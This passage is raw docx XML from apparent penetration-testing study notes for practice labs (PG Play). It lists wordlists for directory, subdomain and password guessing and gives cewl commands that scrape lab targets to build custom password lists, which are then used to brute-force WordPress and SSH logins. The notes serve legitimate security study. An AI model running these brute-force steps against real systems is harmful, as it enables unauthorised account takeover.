      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which recommended wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A lot of people agree that this is enough tho:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raft directory lists for dirbusting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">top1million for subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="976"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rockyou for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raft for Files AND Directories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012EF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raft for Directories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Top1Million for Subdomains:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.tx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirb/others/names.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 15.1.2. RDP for Password attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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00">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_81ekjdjuwkj" w:id="157"/>
      <w:bookmarkEnd w:id="157"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001301">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001302">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a login page and brute force isn't working, then try making a username wordlist of stuff like root, admin, and the name of the service, and then for the password list use cewl. This is what they did in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId361">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GlasgowSmile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl http://192.168.190.79/joomla/administrator/ -d 4 -m 5 -w cewl2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d 4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-: means depth to spider to, more depth returns better results,default is 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : maximum word count </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001306">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : write output to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : target url (uhh, I don't see it being used here though. Maybe a typo on writeup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001308">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001309">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId362">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we were given a hint that we would not be able to bruteforce using a typical wordlist, and that we would have to use the tool cewl, which is used to make custom wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We brute force to Wordpress using wpscan bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cewl http://dc-2/ -w custom_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This web scrapes the specified website (which was the website of the target machine), and then it takes words that are likely to be a password and puts it in a file, one word per line, and then it will be ready to be used by like hydra or wpscan, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000130F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked for DC-2 PG play, specifically for wpscan brute force</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001310">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001311">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001312">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cewl was seen again in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId363">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lampiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, and we knew to use it since the blog post was in portuguese so a normal english wordlist wouldn't work. We used that user's blog post as the wordlist, and the username was the person who posted the blog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="533"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we bruteforce into SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001314">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
